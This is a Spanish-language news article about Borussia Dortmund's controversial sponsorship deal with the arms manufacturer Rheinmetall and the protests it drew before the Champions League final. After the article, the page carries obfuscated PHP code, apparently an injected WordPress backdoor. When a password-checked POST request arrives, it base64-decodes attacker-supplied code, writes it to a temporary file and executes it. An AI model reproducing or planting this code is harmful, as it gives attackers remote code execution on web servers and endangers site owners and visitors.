Lío en Dortmund: alianza con un fabricante de armas

El nuevo patrocinador del rival del Real Madrid en la final de Champions provoca una ola de indignación entre los aficionados y plantea cuestiones éticas sobre los valores del club.

El Borussia Dortmund se ha metido en un buen lío a tan solo un par de días para la final de la Champions contra el Real Madrid. En un movimiento que ha causado gran controversia, el conjunto alemán ha anunciado una nueva asociación de patrocinio con Rheinmetall, un importante fabricante de armas alemán. Este acuerdo, confirmado el miércoles, surge justo antes de que el equipo dispute el partido más importante en décadas, generando preguntas éticas sobre la vinculación del club con la industria armamentística.

Rheinmetall, cuyo valor de mercado se ha quintuplicado desde el inicio de la guerra en Ucrania, se convierte en “Champion Partner” del BVB por los próximos tres años, así dicta el comunicado emitido por el cuadro negriamarillo. Aunque el logotipo de Rheinmetall no aparecerá en las camisetas, ya se puede ver en el entorno del estadio durante la preparación para la final. El acuerdo incluye varios millones de euros anuales a cambio de derechos de marketing y otras ofertas en el estadio y el club.

La reacción de los seguidores del Dortmund no se hizo esperar. Muchos aficionados expresaron su decepción y enfado, mientras que la Asosiación Alemana por la Paz convocó protestas frente a la sede del club. “Estoy muy sorprendido. Nunca pensé que el BVB consideraría una alianza con una empresa de armas”, fueron las palabras de Michael Schulze von Glasser, director de la organización. Se le achaca al club contradecir el compromiso con una sociedad libre de violencia que figura en los estatutos de la entidad borusser.

Hans-Joachim Watzke, director general del club, defendió la alianza argumentando que la seguridad y la defensa son “pilares fundamentales” de la democracia, especialmente en tiempos en que la libertad en Europa está en juego. Sin embargo, el anuncio de esta colaboración ha desviado la atención del inminente y crucial partido en Wembley. Las principales organizaciones de seguidores y el propio departamento de aficionados del BVB han criticado duramente la decisión, explicando que se ha vuelto a “tocar fondo en la búsqueda de beneficios financieros del club”.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}